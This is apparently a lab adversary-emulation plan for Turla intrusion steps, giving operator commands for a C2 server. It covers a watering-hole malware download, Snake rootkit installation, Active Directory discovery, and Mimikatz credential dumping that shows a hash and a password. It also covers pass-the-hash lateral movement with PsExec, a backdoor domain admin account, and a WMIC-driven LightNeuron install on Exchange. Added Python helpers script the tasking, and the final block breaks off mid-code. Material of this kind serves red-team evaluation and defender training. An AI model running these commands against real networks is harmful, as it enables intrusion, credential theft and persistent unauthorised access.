# Scenario Overview

Legend of symbols:

  • 💡 - callout notes
  • - extremely important note
  • ➡️ - Switching to another session
  • - Sign out of something

# Setup

➡️ RDP, do not SSH, to the Kali attacker machine (176.59.15.33).

  • Open a new terminal window, cd to the control_server directory of the cloned repo, and start the control server:
cd /opt/day2/turla/Resources/control_server
rm logs.txt
sudo ./controlServer -c ./config/turla_day2.yml
  • Ensure the EPIC, Snake, and LightNeuron handlers started up.

# Step 11 - Initial Compromise and Establish Foothold

🎤 Voice Track:

Step 11 emulates Turla gaining initial access via a watering hole attack targeting user Egle.

Egle visits a legitimate, but compromised, website. This website redirects Egle to a duplicated, malicious version of the compromised website hosted on an adversary server. The malicious copy contains JavaScript (JS) that fingerprints the machine in the background and installs an evercookie in the browser.

This malicious WordPress website prompts Egle with a notice to update their NotFlash. Egle clicks to download the update, NFVersion_5e.exe, containing EPIC (a.k.a. Tavdig/Wipbot).

The execution flow of EPIC is the same as the execution flow of EPIC in the Carbon scenario. The only difference in this scenario's version of EPIC is that it communicates over HTTPS instead.

Once C2 communications have been established between EPIC and the C2 via the proxy server, discovery is performed on the first host where information about the host device and domain computers is collected.


# ☣️ Procedures

➡️ RDP to Azuolas (10.100.40.103) as Egle:

| Username | Password |
| --- | --- |
| nk\Egle | Producer1! |

  • Open Microsoft Edge and browse to nato-int.com.

  • Wait for redirection to anto-int.com.

  • After redirection you will be prompted to update NotFlash. Click to download the update (NFVersion_5e.exe), which is bundled with EPIC (a.k.a. Tavdig/Wipbot).

  • Once the download has been completed, click the downloaded binary to execute it.

  • Wait 1 minute for it to finish running.

  • Close out of all tabs and sign out of your RDP session.

  • Re-RDP to Azuolas (10.100.40.103) as Egle:

| Username | Password |
| --- | --- |
| nk\Egle | Producer1! |

  • Open Microsoft Edge and browse to https://drebule.nk.local/owa. Log in as Egle:
| Username | Password |
| --- | --- |
| nk\Egle | Producer1! |

➡️ Set a timer for 2 minutes then switch to your Kali control server terminal and confirm that a new implant has registered and the automated discovery output has been returned in the server log.

NOTE: The injector waits 2 minutes before injecting EPIC's Guard DLL into explorer.exe and then EPIC's worker DLL into Microsoft Edge.

  • Within the terminal window, split your terminal horizontally via right-click -> Split Terminal. Be careful not to accidentally terminate the control server running in the upper pane.

  • In your lower terminal tab, task the EPIC implant with the following set of discovery commands:

cd /opt/day2/turla/Resources/control_server
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | systeminfo && net group "Domain Computers" /domain'

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 12 - Rootkit Installation

🎤 Voice Track:

Step 12 emulates Turla exploiting a vulnerable driver to install the Snake rootkit on the Azuolas (10.100.40.103) system.

The existing EPIC implant, running in the context of Egle, will be used to download the Snake installer to the local machine and execute it as second-stage malware. The Snake installer will escalate privileges to SYSTEM by exploiting a Windows 10 vulnerability. Once running as SYSTEM, the installer will disable Driver Signature Enforcement (DSE) by loading and exploiting a vulnerable driver. Once DSE is disabled, the installer will load the Snake rootkit driver.

The rootkit driver will hook various functions and inject a user-mode DLL into a SYSTEM process to execute tasks received from the C2 server. The driver will then wait for a browser process to make a network request and inject the user-mode DLL into that browser process for C2 communications over HTTP. The two injected DLLs communicate with each other via named pipes.

At some point, Egle will browse to a website, triggering the rootkit driver to inject the user-mode DLL into the browser process - this DLL will begin communication with the C2 server over HTTP.


# ☣️ Procedures

  • In your Kali C2 server, ensure that you are in the lower split terminal window.

  • Task the EPIC implant to download the Snake rootkit installer.

./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'name | C:\\Users\\Egle\\Desktop\\gusbsys.exe | snake.exe'
  • Wait 1 minute after the payload is successfully downloaded before tasking the implant to execute the Snake rootkit installer with the privilege escalation option:
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | C:\\Users\\Egle\\Desktop\\gusbsys.exe -f'
  • ➡️ Switch to your RDP session on Azuolas (10.100.40.103) and go to your Edge window. Perform a hard refresh of the current page by pressing Ctrl+Shift+R.

➡️ Return to your Kali C2 server terminal window and verify that a new implant session is beaconing back to the C2 server.

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 13 - First Workstation Discovery

🎤 Voice Track:

Step 13 emulates Turla performing discovery on the first workstation to discover a file server and associated file server admin.

The Snake rootkit receives tasking from the C2 server to enumerate currently running processes on the local computer and finds that EgleAdmin also has processes running. Further enumeration of the EgleAdmin user shows that it is a member of the File Server Admins group. Snake then impersonates Egle to enumerate mapped drives on the local machine and discovers Egle's home drive is actively mapped to the file server.


# ☣️ Procedures

  • ➡️ Return to your RDP session to azuolas (10.100.40.103) as Egle.

  • Open a PowerShell terminal and run the following command:

runas /user:nk\egleadmin powershell
  • When prompted, type in the password for EgleAdmin:
| Username | Password |
| --- | --- |
| nk\EgleAdmin | Producer1! |
  • A new PowerShell window should pop up. Run the following command to confirm that you are running as nk\EgleAdmin:
whoami
  • ➡️ Return to your Kali C2 server.

  • From your lower Kali C2 terminal window, task the Snake rootkit to run the following process discovery command:

# Discover running processes
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}'
  • Verify that the enumerated process output contains a process running under EgleAdmin:
grep 'NK\\EgleAdmin' logs.txt -i
  • This should return output similar to the following:
powershell.exe                2868 RDP-Tcp#6                  5     79,140 K Unknown         NK\egleadmin                                            0:00:00 N/A
conhost.exe                   7368 RDP-Tcp#6                  5     18,088 K Unknown         NK\egleadmin                                            0:00:00 N/A
  • Wait 1 minute then execute the next discovery command to enumerate EgleAdmin's groups:

# Enumerate details on EgleAdmin to find group membership
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "user /domain EgleAdmin"}'

Verify that File Server Admins is listed as one of the groups that EgleAdmin is a member of.

  • Wait 1 minute, then execute the next discovery command to discover the drive mapped to the file server. Snake impersonates Egle for this command, since mapped drives are per-user:
# Discover that the local machine has a drive mapped to the file server
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "use", "runas": "nk\\Egle"}'

Verify that the home drive is mapped to the file server host berzas (10.100.30.204).
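The tasking syntax used from here through Step 18, captured as an added helper (example code written for this page, not part of the evals control server or evalsC2client.py): EPIC takes a pipe-delimited string (`exe | <cmd>`, `name | <dest> | <payload>`), while Snake takes a JSON object whose `type` selects the action. The meaning of each `type` value (1 cmd.exe, 2 PowerShell, 3 create process, 4 download) and of `runas` is inferred from the commands on this page, and the function names are hypothetical. The helper also shows why the plan writes Windows paths in Snake tasks with doubled backslashes and wraps the JSON in single quotes: `json.dumps` and `shlex.quote` reproduce those lines exactly, and keep working when a task contains a single quote, which the hand-typed wrapping would not.

```python
import json
import shlex

# Added example for this page; not the evals control server's or evalsC2client.py's
# own code. Task shapes are inferred from the commands in the plan (assumptions):
#   EPIC : pipe-delimited text, "exe | <cmd>" and "name | <dest> | <payload>"
#   Snake: JSON object; "type" 1 = cmd.exe, 2 = PowerShell, 3 = create process,
#          4 = download file from the C2 payload store; "runas" = token impersonation
C2CLIENT = "./evalsC2client.py"   # run from Resources/control_server on the Kali box


def epic_exe(command):
    """EPIC 'exe' task: run a shell command on the implant host. The plan spells
    Windows paths here with doubled backslashes inside the single quotes; bash passes
    them through literally, so supply the path exactly as the plan writes it."""
    return f"exe | {command}"


def epic_download(dest_path, payload_name):
    """EPIC 'name' task: write payload `payload_name` from the server to `dest_path`."""
    return f"name | {dest_path} | {payload_name}"


def _with_runas(task, runas):
    if runas:
        task["runas"] = runas
    return task


def snake_cmd(command, runas=None):
    """Snake type 1: a cmd.exe command line."""
    return _with_runas({"type": 1, "command": command}, runas)


def snake_powershell(command, runas=None):
    """Snake type 2: PowerShell; the plan always prefixes the progress-bar silencer."""
    ps = '$ProgressPreference = "SilentlyContinue"; ' + command
    return _with_runas({"type": 2, "command": ps}, runas)


def snake_proc(proc, args, runas=None):
    """Snake type 3: start `proc` with the argument string `args`."""
    return _with_runas({"type": 3, "proc": proc, "args": args}, runas)


def snake_download(server_file, dest):
    """Snake type 4: fetch `server_file` from the C2 payload store, write it to `dest`."""
    return {"type": 4, "file": server_file, "dest": dest}


def render_task(task):
    """Wire form of a task. Snake tasks are JSON, so a Windows path written once in
    Python comes out with doubled backslashes (C:\\Windows), as in the plan."""
    return task if isinstance(task, str) else json.dumps(task)


def argv(implant_id, task):
    """Argument vector for evalsC2client.py (what subprocess.run would receive)."""
    return [C2CLIENT, "--set-task", implant_id, render_task(task)]


def shell_line(implant_id, task):
    """Copy-pasteable bash line. shlex.quote keeps the JSON (or EPIC pipe string) as a
    single argument and survives a task that itself contains a single quote."""
    return " ".join(shlex.quote(a) for a in argv(implant_id, task))


def argv_from_shell_line(line):
    """Inverse of shell_line (bash word splitting), to check that quoting round-trips."""
    return shlex.split(line)


if __name__ == "__main__":
    print(shell_line("218780a0-870e-480e-b2c5dc",
                     epic_exe('systeminfo && net group "Domain Computers" /domain')))
    print(shell_line("534b40585d514b554844", snake_proc("net.exe", "use", runas="nk\\Egle")))
    print(shell_line("5054474d50435a51404b",
                     snake_download("PsExec.exe", "C:\\Windows\\System32\\fs_mgr.exe")))
```

Running the block prints the Step 11, Step 13 and Step 16 tasking lines character for character as they appear in this plan; the same functions feed `subprocess.run(argv(...))` if you script the waits between tasks instead of typing them.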

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 14 - Lateral Movement to File Server

🎤 Voice Track:

Step 14 emulates Turla using the discovered admin account to laterally move to the file server and install the Snake rootkit on it.

Using the information discovered in the previous step, Snake impersonates the EgleAdmin account to run PsExec and execute another copy of the Snake rootkit installer on the file server. This new copy of the Snake installer will have the installed rootkit beacon back to the C2 server via a different redirector.


# ☣️ Procedures

  • Task the implant to download PsExec:
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 4, "file": "PsExec.exe", "dest":"C:\\Windows\\System32\\file_svc_mgr.exe"}'
  • Wait 1 minute and then run the following command to download the snake installer:
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 4, "file": "installer_v2.exe", "dest":"C:\\Windows\\System32\\cmu_svc_v2.exe"}'
  • Wait 1 minute before running the following command to execute PsExec as EgleAdmin, which will run the Snake installer on the file server berzas (10.100.30.204):
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "C:\\Windows\\System32\\file_svc_mgr.exe", "args":"\\\\berzas -accepteula -s -c C:\\Windows\\System32\\cmu_svc_v2.exe", "runas":"nk\\EgleAdmin"}'

➡️ Go back to your RDP session to Azuolas (10.100.40.103) as Egle.

  • Minimize the RDP window.

➡️ RDP into berzas (10.100.30.204) as EgleAdmin:

| Username | Password |
| --- | --- |
| nk\EgleAdmin | Producer1! |
  • Close any spurious windows.

  • Open Edge and navigate to https://www.google.com. Perform a search on File server configuration best practices, but don't click on any results.

  • Minimize the RDP window, keeping processes running.

➡️ Check the Kali C2 server terminal window and verify that a new implant session is beaconing back to the C2 server.

  • Wait 1 minute before running the following command to remove files from Azuolas (10.100.40.103):
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 1, "command": "del /Q C:\\Windows\\System32\\file_svc_mgr.exe C:\\Windows\\System32\\cmu_svc_v2.exe"}'

# 🗿 Source Code

# 🔬 Cited Intelligence

# Step 15 - Domain Discovery

🎤 Voice Track:

Step 15 emulates Turla using PowerShell to perform Active Directory user, group, and computer discovery.

The Snake rootkit receives tasking from the C2 server to use the PowerShell ActiveDirectory module to enumerate domain users, admin groups, and computers. Upon discovering Zilvinas's regular and domain admin accounts, Snake will enumerate further details on the accounts. Snake then discovers a workstation belonging to Zilvinas to use as a future lateral movement target.


# ☣️ Procedures

  • From your lower Kali C2 control server terminal window, task Snake to check if the ActiveDirectory PowerShell module is installed.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Get-Module -ListAvailable -Name ActiveDirectory"}'

Verify that you see output. If the implant returns empty output, please contact your lead.

  • Wait 1 minute before tasking Snake to collect a list of Active Directory groups containing the word "management", as members of these groups will likely have elevated permissions on the network.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroup -Filter * | Where-Object Name -Match \"management\" | Select Name"}'

Verify that Server Management is included in the results.

  • Wait 1 minute before tasking Snake to obtain the usernames of accounts within the Server Management domain group. This tells Turla which users to target next.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Server Management\" | Select Name,SamAccountName"}'

Verify that ZilvinasAdmin shows up in the list of accounts.

  • Wait 1 minute before tasking Snake to obtain the usernames of accounts within the Domain Admins domain group.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Domain Admins\" | Select Name,SamAccountName"}'

Verify that ZilvinasAdmin shows up in the list of accounts.

  • Wait 1 minute before tasking Snake to discover domain users. Ensure Zilvinas and ZilvinasAdmin appear in the output.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADUser -Filter {LastLogonDate -ne 0} -Properties * | Select Name,SamAccountName"}'
  • Finally, wait 1 minute before tasking Snake to obtain a list of domain computers and some of their information (IP addresses, DNS names, and description).
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | Select Name,DnsName,IPv4Address,Description"}'

Ensure that Zilvinas' Workstation appears in the Description field for uosis.

# 🗿 Source Code

# 🔬 Cited Intelligence

  • TBD

# Step 16 - Preparation for Lateral Movement to Admin Workstation

🎤 Voice Track:

Step 16 emulates Turla performing credential dumping on the file server with the goal of moving laterally to a workstation owned by a Domain Admin.

Snake downloads Mimikatz to the file server and extracts all NTLM hashes on the target. The command output is sent directly to the C2 server.


# ☣️ Procedures

  • From the Kali C2 server lower terminal window, task Snake to download Mimikatz to the file server:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "mimikatz.exe", "dest": "C:\\Windows\\System32\\loadperf.exe"}'
  • Wait 1 minute and then instruct Snake to download PsExec to the file server:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "PsExec.exe", "dest": "C:\\Windows\\System32\\fs_mgr.exe"}'
  • Wait 1 minute and then run the following command to download the snake installer:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "installer_v3.exe", "dest":"C:\\Windows\\System32\\cmu_svc.exe"}'
  • Wait 1 minute and then instruct Snake to run Mimikatz to dump all NTLM hashes from LSASS:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"pr::d\" \"slsa::lop\" \"quit\""}'
  • Verify that the password Producer2! and the NTLM hash f3fcd61f987a97da49ce5f650b4e6539 for ZilvinasAdmin each appear at least once in the output:
grep '* Username : ZilvinasAdmin' logs.txt -C 5 -i
  • This should return:
    * Username : ZilvinasAdmin
    * Domain   : NK
    * NTLM     : f3fcd61f987a97da49ce5f650b4e6539
    * SHA1     : fc8c801521140666c793108b67716caf4c4189f4
    * DPAPI    : b06d7bea8849897b811e1d73ab22726c
    tsPkG : 
    --
    * Username : ZilvinasAdmin
    * Domain   : NK
    * Password : Producer2!
    kErberoS : 
    * Username : ZilvinasAdmin
    * Domain   : NK.LOCAL
    * Password : (null)
    sSp : 
    crEdMan :

# 🗿 Source Code

# 🔬 Cited Intelligence

  • TBD

# Step 17 - Lateral Movement to Admin Workstation and Persistence

🎤 Voice Track:

Step 17 emulates Turla performing lateral movement to the domain admin's workstation and performing additional persistence by creating a new domain admin account.

The NTLM hash retrieved in the previous step is used in a pass-the-hash attack to move laterally to Zilvinas's workstation. PsExec is run via pass-the-hash to execute the Snake rootkit installer on the target workstation.

Once the admin workstation has been compromised, Snake is used to enumerate processes running on Zilvinas's workstation uosis, where it is discovered that ZilvinasAdmin has processes running which can be used for token impersonation. By impersonating ZilvinasAdmin, a new domain user Leshy is created and added to the Domain Admins domain group for persistence.


# ☣️ Procedures

  • Instruct Snake to pass-the-hash using ZilvinasAdmin's NTLM hash to run PsExec and install Snake on the target workstation.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"privilege::debug\" \"sekurlsa::pth /user:ZilvinasAdmin /ntlm:f3fcd61f987a97da49ce5f650b4e6539 /domain:nk.local /remotepc:uosis /pexe:C:\\Windows\\System32\\fs_mgr.exe /sys:1 /prun:C:\\Windows\\System32\\cmu_svc.exe\" \"quit\""}'

➡️ Wait 2 minutes. Start a new RDP session to uosis (10.100.40.102) as Zilvinas:

| Username | Password |
| --- | --- |
| nk\Zilvinas | Producer2! |
  • Open Edge and navigate to https://drebule.nk.local/owa. Log in as Zilvinas:
| Username | Password |
| --- | --- |
| nk\Zilvinas | Producer2! |
  • Spend a couple of minutes reading through any unread emails while waiting for the implant to start beaconing back to the C2 server.

➡️ Return to the Kali C2 terminal window and verify that a new implant session is beaconing back to the C2 server.

  • Wait 1 minute and then task the implant to delete artifacts from the file server.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 1, "command": "del /Q C:\\Windows\\System32\\fs_mgr.exe C:\\Windows\\System32\\loadperf.exe C:\\Windows\\System32\\cmu_svc.exe"}'
  • ➡️ Return to your RDP session to uosis (10.100.40.102) as Zilvinas.

  • Click on the search bar and search for powershell. Right click powershell and then click "Run as Administrator".

  • When prompted, type in the username and password for ZilvinasAdmin:

| Username | Password |
| --- | --- |
| nk\ZilvinasAdmin | Producer2! |
  • A new PowerShell window should pop up. Run the following command to confirm that you are running as nk\ZilvinasAdmin:
whoami

➡️ Return to the Kali C2 server

  • From the lower terminal window, task Snake to enumerate running processes on the machine to discover processes under ZilvinasAdmin.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}'
  • Verify that processes running under ZilvinasAdmin are found:
grep 'NK\\ZilvinasAdmin' logs.txt -i 
  • This should return output similar to the following:
powershell.exe                8152 RDP-Tcp#2                  3     83,280 K Unknown         NK\ZilvinasAdmin                                        0:00:00 N/A
conhost.exe                    312 RDP-Tcp#2                  3     17,356 K Unknown         NK\ZilvinasAdmin                                        0:00:00 N/A
  • Wait 1 minute, then instruct Snake to create a new domain user Leshy using an access token from one of the ZilvinasAdmin processes. Leshy will be used as a backdoor domain admin account for persistence on the domain.

./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "net user leshy Password12345 /add /domain", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute, then instruct Snake to add Leshy to the Domain Admins group.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "net group \"Domain Admins\" leshy /add /domain", "runas": "nk\\zilvinasadmin"}'
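The `tasklist /v` check in this step, and the identical one against EgleAdmin in Step 13, as an added Python example (not part of the original page or the evals tooling): instead of a `grep -i` over logs.txt, parse the verbose output and list the processes owned by the account whose token Snake is about to impersonate, plus every other account that currently has processes on the host. The sample output is constructed for this example; only the two EgleAdmin rows are copied from Step 13, the other rows are made up, and the column layout follows `tasklist /v` on Windows 10.

```python
import re

# Constructed sample of `tasklist /v` output as Snake returns it to logs.txt. The two
# EgleAdmin rows mirror the ones shown in Step 13; the other rows are made up here.
SAMPLE_TASKLIST = "\n".join([
    "Image Name                     PID Session Name        Session#    Mem Usage Status          User Name                                              CPU Time Window Title",
    "========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================",
    "System Idle Process              0 Services                   0          8 K Unknown         NT AUTHORITY\\SYSTEM                                   3:42:14 N/A",
    "explorer.exe                  4712 RDP-Tcp#6                  5    112,040 K Running         NK\\Egle                                                0:00:12 N/A",
    "msedge.exe                    5260 RDP-Tcp#6                  5    210,512 K Running         NK\\Egle                                                0:00:05 Outlook - Microsoft Edge",
    "powershell.exe                2868 RDP-Tcp#6                  5     79,140 K Unknown         NK\\egleadmin                                            0:00:00 N/A",
    "conhost.exe                   7368 RDP-Tcp#6                  5     18,088 K Unknown         NK\\egleadmin                                            0:00:00 N/A",
])

# One verbose tasklist row. Image name, status and user name may contain spaces
# ("System Idle Process", "Not Responding", "NT AUTHORITY\SYSTEM"), so the pattern is
# anchored on the fields that cannot: PID, session number, the "<n> K" memory figure
# and the h:mm:ss CPU time. Header and separator lines simply fail to match.
_ROW = re.compile(
    r"^(?P<image>.+?)\s+(?P<pid>\d+)\s+(?P<session>\S+)\s+(?P<session_no>\d+)\s+"
    r"(?P<mem_kb>[\d,]+) K\s+(?P<status>Unknown|Running|Not Responding)\s+"
    r"(?P<user>.+?)\s+(?P<cpu>\d+:\d\d:\d\d)\s+(?P<title>.*)$"
)


def parse_tasklist_v(text):
    """Return one dict per process row with pid and memory converted to integers."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line.rstrip())
        if not m:
            continue
        rec = m.groupdict()
        rec["pid"] = int(rec["pid"])
        rec["mem_kb"] = int(rec["mem_kb"].replace(",", ""))
        rows.append(rec)
    return rows


def users_with_processes(text):
    """Distinct accounts owning processes: the 'who else is logged on here' view."""
    return sorted({r["user"] for r in parse_tasklist_v(text) if r["user"] != "N/A"})


def processes_for_user(text, user):
    """Processes owned by `user`, compared case-insensitively like `grep -i`; any of
    these is a candidate whose token Snake can impersonate."""
    wanted = user.lower()
    return [r for r in parse_tasklist_v(text) if r["user"].lower() == wanted]


if __name__ == "__main__":
    print(users_with_processes(SAMPLE_TASKLIST))
    for p in processes_for_user(SAMPLE_TASKLIST, "NK\\EgleAdmin"):
        print(p["pid"], p["image"], p["session"])
```

The same function answers both questions the voice tracks pose: `users_with_processes` reveals that an admin account is logged on, and `processes_for_user` gives the PIDs Snake can take a token from.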

# 🗿 Source Code

# 🔬 Cited Intelligence

  • TBD

# Step 18 - Lateral Movement to Exchange Server

🎤 Voice Track:

Step 18 emulates Turla laterally moving to the Exchange server and installing the LightNeuron implant there.

Snake downloads LightNeuron along with its PowerShell installation script and config files, transfers them to the Exchange server, and remotely executes the installation script via WMI to install LightNeuron on the Exchange server.


# ☣️ Procedures

  • From the Kali C2 lower terminal window, task Snake to download LightNeuron:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "ln_transport_agent.dll", "dest":"C:\\Windows\\System32\\mtxconf.dll"}'
  • Wait 1 minute and then task Snake to download the companion DLL for LightNeuron:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "n_installer_aux.dll", "dest":"C:\\Windows\\System32\\mtxcli.dll"}'
  • Wait 1 minute and then task Snake to download the PowerShell installation script for LightNeuron:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "msiex.ps1", "dest":"C:\\Windows\\System32\\msiex.ps1"}'
  • Wait 1 minute and then task Snake to download the LightNeuron email rules file.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "rules.xml", "dest":"C:\\Windows\\System32\\wdr.rules.xml"}'
  • Wait 1 minute and then task Snake to download the LightNeuron config file.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "winmail.dat", "dest":"C:\\Windows\\System32\\perfe009.dat"}'
  • Wait 1 minute and then task Snake to copy LightNeuron, the rules config file, and the PowerShell installation script to the remote target drebule, using token impersonation to perform the copy as ZilvinasAdmin:
# Copy LightNeuron
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxconf.dll \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\agents\\Hygiene\\Microsoft.Exchange.Transport.Agent.ConnectionFiltering.dll\"", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute before copying the next file:
# Copy LightNeuron companion DLL
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxcli.dll \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\exdbdata.dll\"", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute before copying the next file:
# Copy installation script
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\msiex.ps1 \\\\drebule\\C$\\Windows\\System32\\msiex.ps1", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute before copying the rules file:
# Copy email rules file
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\wdr.rules.xml \\\\drebule\\C$\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\msmdat.xml", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute before copying the last config file:
# Copy config file
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\perfe009.dat \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\winmail.dat\"", "runas": "nk\\zilvinasadmin"}'
  • Wait 1 minute and then task Snake to install LightNeuron remotely using WMI and PowerShell, again with ZilvinasAdmin's token:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 3, "proc": "wmic.exe", "args": "/node:drebule /privileges:enable /output:STDOUT process call create \"cmd.exe /c powershell.exe -File C:\\Windows\\System32\\msiex.ps1 > C:\\Windows\\Temp\\msiexinstallation.log 2>&1\"", "runas": "nk\\ZilvinasAdmin"}'

Verify that the WMIC output shows a ReturnValue of 0.

  • Wait 1 minute and then task Snake to check the installation log for any errors:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "type \\\\drebule\\C$\\Windows\\Temp\\msiexinstallation.log", "runas": "nk\\ZilvinasAdmin"}'

Expected output will start with messages regarding PS-Session, the bottom of the file should look like:

PSComputerName        : localhost
RunspaceId            : 1e56a6dd-5fd2-4545-9db8-2a4ca6a77212
Enabled               : False
Priority              : 10
TransportAgentFactory : Microsoft.Exchange.Transport.Agent.ConnectionFiltering.ConnectionFilteringAgentFactory
AssemblyPath          : C:\Program Files\Microsoft\Exchange Server\V15\TransportRoles\agents\Hygiene\Microsoft.Exchange
                        .Transport.Agent.ConnectionFiltering.dll
IsCritical            : True
EscalationTeam        : 
Identity              : Connection Filtering Agent
IsValid               : True
ObjectState           : New

WARNING: Please exit Windows PowerShell to complete the installation.
WARNING: The following service restart is required for the change(s) to take effect : MSExchangeTransport
WARNING: The following service restart is required for the change(s) to take effect : MSExchangeTransport
WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to stop...
WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to start...

If the output contains any errors, notify your lead.
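The two verifications in this step (the WMIC `ReturnValue` and the install log) as an added Python check, written for this page rather than taken from the evals tooling. It parses PowerShell's `key : value` record format, including the wrapped `AssemblyPath` value continued on an indented line, separates the trailing WARNING messages, and flags anything that reads like an error. The sample WMIC output and log tail are constructed to match the expected output shown above (the ProcessId is made up); the error-keyword list is an assumption about what a failed Install-TransportAgent run would print.

```python
import re

# Constructed samples in the shape of what this step expects: WMIC's
# `process call create` result (ProcessId made up) and the tail of msiexinstallation.log.
SAMPLE_WMIC = """\
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5528;
        ReturnValue = 0;
};
"""

SAMPLE_INSTALL_LOG = """\
PSComputerName        : localhost
RunspaceId            : 1e56a6dd-5fd2-4545-9db8-2a4ca6a77212
Enabled               : False
Priority              : 10
TransportAgentFactory : Microsoft.Exchange.Transport.Agent.ConnectionFiltering.ConnectionFilteringAgentFactory
AssemblyPath          : C:\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\agents\\Hygiene\\Microsoft.Exchange
                        .Transport.Agent.ConnectionFiltering.dll
IsCritical            : True
EscalationTeam        : 
Identity              : Connection Filtering Agent
IsValid               : True
ObjectState           : New

WARNING: Please exit Windows PowerShell to complete the installation.
WARNING: The following service restart is required for the change(s) to take effect : MSExchangeTransport
WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to stop...
WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to start...
"""

# A property line is "<Name><spaces>: <value>"; message lines such as "WARNING: ..."
# have no whitespace before the colon and therefore do not match.
_PROP = re.compile(r"^(\w+)\s+:\s?(.*)$")
# Assumption: words a failed Install-TransportAgent / Enable-TransportAgent run would print.
_ERROR_WORDS = re.compile(r"\b(error|exception|failed|cannot|denied)\b", re.I)


def wmic_return_value(text):
    """ReturnValue from Win32_Process.Create output, or None when it is missing."""
    m = re.search(r"ReturnValue\s*=\s*(\d+)", text)
    return int(m.group(1)) if m else None


def parse_install_log(text):
    """Split the log into the agent property record and the trailing message lines.
    An indented line continues the previous value (PowerShell wraps long ones)."""
    props, messages, last_key = {}, [], None
    for line in text.splitlines():
        m = _PROP.match(line)
        if m:
            last_key = m.group(1)
            props[last_key] = m.group(2).strip()
        elif line.startswith(" ") and last_key and line.strip():
            props[last_key] += line.strip()
        elif line.strip():
            last_key = None
            messages.append(line.strip())
    return props, messages


def install_status(wmic_text, log_text):
    """Everything this step asks the operator to confirm, in one dict."""
    props, messages = parse_install_log(log_text)
    return {
        "launched": wmic_return_value(wmic_text) == 0,
        "agent_identity": props.get("Identity"),
        "assembly_path": props.get("AssemblyPath"),
        "agent_valid": props.get("IsValid") == "True",
        "transport_restarted": any("to start..." in m for m in messages),
        "errors": [m for m in messages if _ERROR_WORDS.search(m)],
    }


if __name__ == "__main__":
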